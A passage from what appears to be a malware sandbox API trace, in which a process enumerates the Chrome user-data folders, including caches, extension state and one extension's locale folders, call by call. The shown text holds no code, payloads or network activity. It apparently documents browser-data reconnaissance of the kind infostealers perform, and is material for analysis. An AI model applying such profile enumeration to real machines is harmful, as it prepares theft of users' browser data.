lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa329e8 [0149.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ba8 [0149.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x253e808 | out: lpFindFileData=0x253e808) returned 0xa32be8 [0149.801] FindClose (in: hFindFile=0xa32be8 | out: hFindFile=0xa32be8) returned 1 [0149.801] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33800b0 | out: hHeap=0x20f0000) returned 1 [0149.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x253e808 | out: lpFindFileData=0x253e808) returned 0xa32be8 [0150.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0150.162] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0150.162] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0150.162] FindClose (in: hFindFile=0xa32be8 | out: hFindFile=0xa32be8) returned 1 [0150.162] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33800b0 | out: hHeap=0x20f0000) returned 1 [0150.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x253e808 | out: lpFindFileData=0x253e808) returned 0xa32be8 [0150.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0151.374] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0151.374] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0153.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0154.956] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0154.957] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0154.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0156.895] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0156.896] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0156.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0157.339] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0157.339] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0157.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32c28 [0157.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x253e300 | out: lpFindFileData=0x253e300) returned 0xa32ca8 [0157.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x253e07c | out: lpFindFileData=0x253e07c) returned 0xa32c68 [0157.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*", lpFindFileData=0x253ddf8 | out: lpFindFileData=0x253ddf8) returned 0xa32da8 [0157.342] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.342] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.343] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.343] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.343] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.343] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.343] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.344] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.344] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.344] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.344] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.344] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.345] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.345] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.345] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.345] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.345] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.345] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.346] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.346] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.346] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.346] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.346] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.347] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.347] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.347] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.347] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.348] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.348] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.348] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.348] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.349] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.349] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.349] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.349] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.349] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.349] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.350] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.350] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.350] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.350] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.350] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.350] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.351] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.351] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.351] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.351] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.352] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.353] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.354] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.354] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.354] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.354] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.355] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.355] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.355] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.355] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.357] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.357] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.357] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.358] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.358] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.358] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.358] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.358] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.358] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.359] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.359] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.359] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.359] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.359] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.360] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.360] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.360] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.360] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.360] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.361] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.362] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.362] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.362] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.362] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.362] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.363] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.363] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.363] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.363] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0157.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x253db74 | out: lpFindFileData=0x253db74) returned 0xa32d28 [0157.363] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0157.363] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, 